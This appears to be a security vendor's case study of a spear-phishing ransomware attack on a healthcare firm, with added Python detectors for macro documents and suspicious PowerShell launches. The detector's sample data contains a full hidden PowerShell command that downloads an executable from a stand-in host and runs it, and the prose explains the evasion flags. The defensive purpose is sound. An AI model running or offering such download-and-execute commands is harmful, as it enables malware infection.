2016-12-06

We recently saw a targeted ransomware attack against a large healthcare firm.  We developed this case study to show how ransomware typically infiltrates such an organization, and how it can cause considerable damage if not prevented. Targeted attacks against an organization are not rare. However, in this case the adversaries went out of their way to carefully construct a wave of spear phishing attacks. In addition to illustrating the attack, we include the technical details, along with indicators of compromise, showing the spear phish emails, weaponized Office documents, and ransomware techniques used.

The High Value of Targeting Healthcare

Before delving into the methodology of the attack, it is important to understand what factors played a role in how and why the adversary chose its target.  Adversaries have a variety of options when deciding the attack vector and payload of a targeted attack.  In this case the adversary chose ransomware as the choice payload for the attack.  Most ransomware variants today use powerful algorithms to encrypt files. This leaves the victim no choice but to pay the ransom anonymously over Tor using bitcoins in order to decrypt the files.  In 2015 health technology was the most profitable sector and is projected to be the most profitable again in 2016 with a 21.6% profit margin.  Given this information, it’s clear that there is a significant revenue upside in targeting a medical technology firm with ransomware.

The adversary chose a spear phishing campaign as the attack vector in this case.  People have a natural desire to be informed and are inclined to click on things that grant them access to insider information.  Spear phishing uses target-specific information to undermine access control policies and bait a potential victim into an exploit—or to volunteer proprietary information. Even when the information is unsolicited or the sender of the message is unrecognized, a well-crafted spear phish that hinges on the precepts of social engineering (psychological manipulation) can still be very effective. In today’s workforce, an attack like this can cripple an entire company if not caught and addressed in a timely manner.  An infection that starts out on one computer can quickly spread over the network to other machines and file repositories.  If this happens the enterprise is in crisis, forced to take down their own internal networks and systems to prevent the spread. Alternatively, they can choose to pay the ransom to obtain the decryption key and decrypt all the files, perhaps not even knowing if the decryption keys would work.  It’s a tough decision that most CISOs don’t ever want to face.

Targeting the Healthcare Firm

Adversaries in an effective spear phishing campaign begin by conducting reconnaissance.  The adversary looks for specific information about a company that they can use to bait employees.  A lot of information can be discovered relatively easily with simple Google searches or by browsing social media websites.  People often check in at specific locations on Foursquare, and post their phone number (area code included), email address, common friends, and employment history on Facebook and/or LinkedIn.  Adversaries will study press releases, investor calls, and public presentations in order to home in on their target(s).

Once an adversary gains enough relevant information, they use it to craft legitimate-looking emails to employees in order to further their malicious plan.  The adversary can employ social engineering tactics to persuade the victim to volunteer more critical information, and then turn around and sell it in the underground market for large sums of money.  The information can be in the form of employee personally identifiable information, company secrets, or other sensitive information that could be damaging if leaked.  Alternatively, the adversary can use this information to deliver ransomware via a weaponized document, which is becoming the case quite frequently.

Technical Analysis of Attack

To properly carry out a spear phishing campaign, the adversary must gather relevant information about a targeted group of individuals: the corporate computer image, OS version, patch schedule, network edge firewall, proxy, open ports, and other important details.  In this case, the adversary used the company’s name along with other industry-specific keywords to craft emails to employees in the firm.  The adversary used weaponized document attachments with names related to the company and its respective industry.

Figure 1:  WINWORD process opening malicious document

Figure 2:  Malicious document names

Weaponized documents, which contain embedded Visual Basic for Applications (VBA), batch, or other scripts, are quite frequently used in spear phishing attacks.  They are used to distribute a wide variety of malicious payloads.  Upon opening the document, the victim is still safe from the malicious script.  However, the document is purposefully not entirely visible until macros are enabled to run.  The victim will usually see a message similar to that in Figure 3 that requests permission to enable macros.
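One mail-gateway check for such documents, written here as an added example rather than anything from the original post: it inspects an attachment for a VBA project part inside the Office Open XML (zip) container and flags legacy OLE files for deeper inspection. The in-memory sample container and the attachment names are constructed for the example.

```python
import io
import zipfile

# Legacy binary Office files (.doc/.xls) are OLE compound files; their VBA lives in
# OLE streams, so only the container is recognised here and flagged for deeper checks.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Extensions whose OOXML container is not supposed to carry a VBA project at all.
MACRO_FREE_EXTENSIONS = {"docx", "xlsx", "pptx"}


def has_vba_project(data: bytes) -> bool:
    """True if an OOXML (zip) container holds a vbaProject.bin part in any folder."""
    if not data.startswith(b"PK"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return any(name.lower().endswith("vbaproject.bin")
                       for name in archive.namelist())
    except zipfile.BadZipFile:
        return False


def classify_attachment(filename: str, data: bytes) -> str:
    """Gateway verdict: 'clean', 'macro-enabled', 'extension-mismatch' or 'legacy-ole'."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    if data.startswith(OLE_MAGIC):
        return "legacy-ole"
    if has_vba_project(data):
        # A .docx/.xlsx/.pptx that carries VBA is mislabelled or crafted; treat it as worse.
        return "extension-mismatch" if ext in MACRO_FREE_EXTENSIONS else "macro-enabled"
    return "clean"


def build_sample(with_macro: bool) -> bytes:
    """Construct a minimal OOXML container in memory (sample input, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder bytes standing in for a compiled VBA project.
            archive.writestr("word/vbaProject.bin", b"placeholder-vba-project")
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in [("Invoice_Q4.docm", build_sample(True)),
                       ("Invoice_Q4.docx", build_sample(True)),
                       ("Invoice_Q4.docx", build_sample(False))]:
        print(name, "->", classify_attachment(name, blob))
```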

Figure 3:  MS Word enabling macros in document

Once macros are authorized to run, the host machine is essentially infected.  The embedded macro kicks off the execution of a script, in this case a PowerShell script, that makes a variety of changes to the system.

Figure 4:  Malicious PowerShell script

A few things to note in this PowerShell script:

The script runs in the background with the -windowstyle flag set to hidden.  The hidden window makes the prompt open and close very quickly: the victim may see the prompt pop up very briefly but cannot do anything about it.  The -nop flag does not load the Windows PowerShell profile.

By default, PowerShell does not allow scripts to execute without elevated privileges. The -ep (execution policy) bypass flag allows the script to run without administrative consent; because the execution policy is a per-process setting rather than a security boundary, any user can override it this way.

While running stealthily in the background, the script uses the WebClient class to download the malicious binary from the specified website and executes it with the WScript.Shell class.  With the exception of the brief PowerShell window popup, the victim is completely oblivious to the malicious activity happening in the background.
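As an added example (not code from the original post or from Invincea), the following Python scores Windows process-creation events for the chain described above: WINWORD spawning PowerShell with a hidden window, -nop, -ep bypass, a WebClient download and a WScript.Shell launch. The Sysmon-style sample events, user paths and download URL are constructed for the example; the weights and threshold are assumptions to tune against your own telemetry.

```python
import re

# Constructed Sysmon-style process-creation events (sample input, not real telemetry).
SAMPLE_EVENTS = [
    {   # the chain in this case: Word -> hidden PowerShell -> download -> run
        "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            r"powershell.exe -windowstyle hidden -nop -ep bypass -c "
            r"(New-Object System.Net.WebClient).DownloadFile("
            r"'http://payload.example.invalid/a.exe','C:\Users\jdoe\AppData\Local\Temp\a.exe');"
            r"(New-Object -ComObject WScript.Shell).Run('C:\Users\jdoe\AppData\Local\Temp\a.exe')"),
    },
    {   # benign admin script launched from the desktop
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    },
    {   # Word spawning its print helper: Office parent, but not PowerShell
        "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": r"C:\Windows\splwow64.exe 12288",
    },
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Indicators mirror the flags and classes the script relied on; PowerShell accepts
# abbreviated parameter names (-w, -ep, -ex), so the patterns accept them as well.
PATTERNS = {
    "hidden_window": re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
    "ep_bypass": re.compile(r"-e(?:p|x|xec|xecutionpolicy)?\s+bypass", re.I),
    "webclient_download": re.compile(r"Net\.WebClient|Download(?:File|String)", re.I),
    "wscript_shell": re.compile(r"WScript\.Shell", re.I),
}
WEIGHTS = {"office_parent": 3, "hidden_window": 2, "no_profile": 1, "ep_bypass": 2,
           "webclient_download": 3, "wscript_shell": 2}
ALERT_THRESHOLD = 5  # an Office parent (3) plus a hidden window (2) is enough to alert


def score_event(event):
    """Score one event: PowerShell under an Office parent with stealth/download flags alerts."""
    hits = []
    if event.get("Image", "").lower().endswith("powershell.exe"):
        parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
        if parent in OFFICE_PARENTS:
            hits.append("office_parent")
        cmd = event.get("CommandLine", "")
        hits += [name for name, pat in PATTERNS.items() if pat.search(cmd)]
    score = sum(WEIGHTS[h] for h in hits)
    return {"score": score, "hits": hits, "alert": score >= ALERT_THRESHOLD}
```

Run it over each entry in SAMPLE_EVENTS to see which one alerts; in production, feed it the command line and parent image fields from your endpoint telemetry.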

Figure 5: X by Invincea catching the malicious binary being created and executed

Preventing Similar Attacks

X by Invincea machine learning next-generation antivirus is deployed in conjunction with other security tools in the enterprise.  The fact that the threat was able to reach the endpoint without being caught by the other security tools in front of the endpoint raises the question, “how did such malicious content get inside?”

With spam filters, proxies, and other prevention tools in place, attackers must find ways to circumvent these prevention techniques to ensure the malicious email reaches their victims.  In order to combat this there are basic email conventions that companies can follow to avoid adversaries gaining access to employee email addresses.  The typical <FirstName.LastName>@<CompanyName>.com is quite easy to guess.  More advanced steps can be taken to prevent these types of emails from reaching a company email server.  A network proxy that sits at the edge of a corporate network can immediately filter out traffic and emails from known malicious domains or websites.  In an attempt to get past these spam filters, adversaries sometimes set up their own personal email servers and phish victims from unfamiliar domain names.

Most of the known email providers (Gmail, Yahoo, etc.) have pretty thorough email spam filters that block traffic coming from smaller email servers.  For enterprise hosted mailing servers, these spam filters must be constantly adjusted to keep up with the rate at which adversaries create new email domains and spam from there.

There are many more security tools and techniques that can be implemented to prevent phishing attacks, such as antivirus at the gateway or outsourcing email through a third-party scrubbing service like Messagelabs.  The problem is they are all mitigation techniques and do not fully secure the endpoint.  If one of these control systems fails in its duty due to an outage or misconfiguration, the attack may reach the endpoint.  Fortunately, the healthcare firm in this case study had X by Invincea machine learning next-generation antivirus in place. X by Invincea is proven to block threats like the ones in this case study.  When malware slips through the cracks of other preventative tools, X by Invincea catches and kills these infections before they can spread and cause more damage on the network. It stops weaponized Office documents, ransomware, and eliminates the threat of spear phishing… all of the techniques used against this (very satisfied) X by Invincea customer.

Appendix: IOCs
